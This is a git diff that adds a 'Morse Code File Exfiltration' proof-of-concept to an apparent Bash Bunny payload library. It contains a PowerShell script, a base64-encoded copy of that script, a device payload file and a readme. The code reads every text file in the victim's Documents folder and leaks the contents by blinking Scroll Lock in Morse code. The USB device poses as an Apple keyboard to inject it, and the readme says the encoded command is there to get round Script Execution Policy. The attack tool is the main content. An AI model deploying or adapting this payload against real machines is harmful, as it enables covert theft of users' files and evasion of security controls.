diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 b/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 new file mode 100644 index 00000000..e0a1865a --- /dev/null +++ b/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 @@ -0,0 +1,33 @@ +$o = New-Object -com wscript.shell; +$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" }; +$l = '{SCROLLLOCK}'; +function flashy($t){ + $o.SendKeys($l); + sleep -m ([int]$t); + $o.SendKeys($l); + #[console]::beep(600,([int]$t)); + sleep -m 300; +} +gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % { + $v = $h[[string]$_]; + if ($v) + { + $v| % {$_[0..($_.length)]} | % { + flashy((([int]([string]$_))*100)); + } + } + elseif ((!$v) -and !(([int]$_) -eq 32)) + { + flashy(2700); + $v = ([string]([int]$_)); + $v| % {$_[0..($_.length)]} | % { + $h[[string]$_] | % {$_[0..($_.length)]} | % { + flashy((([int]([string]$_))*100)); + } + } + }else{ + sleep -m 1200; + } + sleep -m 600; + } + \ No newline at end of file diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/b.txt b/payloads/library/poc/WIN_PoSH_MorseCode/b.txt new file mode 100644 index 00000000..4f14daf4 --- /dev/null +++ b/payloads/library/poc/WIN_PoSH_MorseCode/b.txt @@ -0,0 +1 @@ +JABvACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAdwBzAGMAcgBpAHAAdAAuAHMAaABlAGwAbAA7ACAAJABoACAAPQAgAEAAewAgACIAMQAiAD0AIgAzADkAOQA5ADkAIgA7ACAAIgAyACIAPQAiADMAMwA5ADkAOQAiADsAIAAiADMAIgA9ACIAMwAzADMAOQA5ACIAOwAgACIANAAiAD0AIgAzADMAMwAzADkAIgA7ACAAIgA1ACIAPQAiADMAMwAzADMAMwAiADsAIAAiADYAIgA9ACIAOQAzADMAMwAzACIAOwAgACIANwAiAD0AIgA5ADkAMwAzADMAIgA7ACAAIgA4ACIAPQAiADkAOQA5ADMAMwAiADsAIAAiADkAIgA9ACIAOQA5ADkAOQAzACIAOwAgACIAMAAiAD0AIgA5ADkAOQA5ADkAIgA7ACAAIgBBACIAPQAiADMAOQAiADsAIAAiAEIAIgA9ACIAOQAzADMAMwAiADsAIAAiAEMAIgA9ACIAOQAzADkAMwAiADsAIAAiAEQAIgA9ACIAOQAzADMAIgA7ACAAIgBFACIAPQAiADMAIgA7ACAAIgBGACIAPQAiADMAMwA5ADMAIgA7ACAAIgBHACIAPQAiADkAOQAzACIAOwAgACIASAAiAD0AIgAzADMAMwAzACIAOwAgACIASQAiAD0AIgAzADMAIgA7ACAAIgBKACIAPQAiADMAOQA5ADkAIgA7ACAAIgBLACIAPQAiADkAMwA5ACIAOwAgACIATAAiAD0AIgAzADkAMwAzACIAOwAgACIATQAiAD0AIgA5ADkAIgA7ACAAIgBOACIAPQAiADkAMwAiADsAIAAiAE8AIgA9ACIAOQA5ADkAIgA7ACAAIgBQACIAPQAiADMAOQA5ADMAIgA7ACAAIgBRACIAPQAiADkAOQAzADkAIgA7ACAAIgBSACIAPQAiADMAOQAzACIAOwAgACIAUwAiAD0AIgAzADMAMwAiADsAIAAiAFQAIgA9ACIAOQAiADsAIAAiAFUAIgA9ACIAMwAzADkAIgA7ACAAIgBWACIAPQAiADMAMwAzADkAIgA7ACAAIgBXACIAPQAiADMAOQA5ACIAOwAgACIAWAAiAD0AIgA5ADMAMwA5ACIAOwAgACIAWQAiAD0AIgA5ADMAOQA5ACIAOwAgACIAWgAiAD0AIgA5ADkAMwAzACIAIAB9ADsAIAAkAGwAIAA9ACAAJwB7AFMAQwBSAE8ATABMAEwATwBDAEsAfQAnADsAIABmAHUAbgBjAHQAaQBvAG4AIABmAGwAYQBzAGgAeQAoACQAdAApAHsAIAAgACAAIAAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAKABbAGkAbgB0AF0AJAB0ACkAOwAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAMwAwADAAOwAgAH0AIABnAGMAaQAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACcATQB5AEQAbwBjAHUAbQBlAG4AdABzACcAKQApACAALQBmAGkAbABlACAALQByACAAKgAuAHQAeAB0ACAAfAAgACUAIAB7ACAAZwBjACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkALgBUAG8AVQBwAHAAZQByACgAKQB9ACAAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACQAdgAgAD0AIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AOwAgACAAIAAgACAAaQBmACAAKAAkAHYAKQAgACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABmAGwAYQBzAGgAeQAoACgAKABbAGkAbgB0AF0AKABbAHMAdAByAGkAbgBnAF0AJABfACkAKQAqADEAMAAwACkAKQA7ACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgAH0AIAAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAoACEAJAB2ACkAIAAtAGEAbgBkACAAIQAoACgAWwBpAG4AdABdACQAXwApACAALQBlAHEAIAAzADIAKQApACAAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgAGYAbABhAHMAaAB5ACgAMgA3ADAAMAApADsAIAAgACAAIAAgACAAIAAgACAAJAB2ACAAPQAgACgAWwBzAHQAcgBpAG4AZwBdACgAWwBpAG4AdABdACQAXwApACkAOwAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AIAB8ACAAJQAgAHsAJABfAFsAMAAuAC4AKAAkAF8ALgBsAGUAbgBnAHQAaAApAF0AfQAgAHwAIAAlACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZgBsAGEAcwBoAHkAKAAoACgAWwBpAG4AdABdACgAWwBzAHQAcgBpAG4AZwBdACQAXwApACkAKgAxADAAMAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgACAAIAAgACAAfQAgACAAIAAgACAAfQBlAGwAcwBlAHsAIAAgACAAIAAgACAAIAAgACAAIABzAGwAZQBlAHAAIAAtAG0AIAAxADIAMAAwADsAIAAgACAAIAAgAH0AIAAgACAAIAAgAHMAbABlAGUAcAAgAC0AbQAgADYAMAAwADsAIAAgAH0A \ No newline at end of file diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt b/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt new file mode 100644 index 00000000..db924b48 --- /dev/null +++ b/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt @@ -0,0 +1,22 @@ +# Title: Morse Code File Exfiltration +# Description: Reads all txt file and Flashes the Scrolllock on and off to represent morse code +# Author: Cribbit +# Version: 1.0 +# Category: PoC +# Target: Windows (Powershell 5.1+) +# Attackmodes: HID & STORAGE +# Extensions: Run +# Notes: Morse code only surports [0..9A..Z] so other char will be show as blanks + +LED SETUP + +GET SWITCH_POSITION + +ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E + +LED ATTACK + +QUACK DELAY 200 +RUN WIN "powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\b.txt')))" + +LED FINISH \ No newline at end of file diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/readme.md b/payloads/library/poc/WIN_PoSH_MorseCode/readme.md new file mode 100644 index 00000000..a7000b9e --- /dev/null +++ b/payloads/library/poc/WIN_PoSH_MorseCode/readme.md @@ -0,0 +1,33 @@ +# Morse Code File Exfiltration +* Author: Cribbit +* Version: 1.0 +* Target: Windows (Powershell 5.1+) +* Category: PoC +* Attackmode: HID & Storage + +## Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.0 | Initial release | +| 1.1 | Update for non-alphanumeric | +| 1.2 | Update for space timing | + +## Description +Reads all txt file in my documents and Flashes the Scrolllock on and off to represent Morse code of the engish alphanumeric characters (0..9 A..Z) + +## Update +For characters out side the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value ie (@ = 64 = -.... ....-) + +## Note +This is not a very useful payload with limitation of morse code but I thought it was fun to create. + +The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing. + +Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious. + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISH | Green blink followed by SOLID | Script is finished |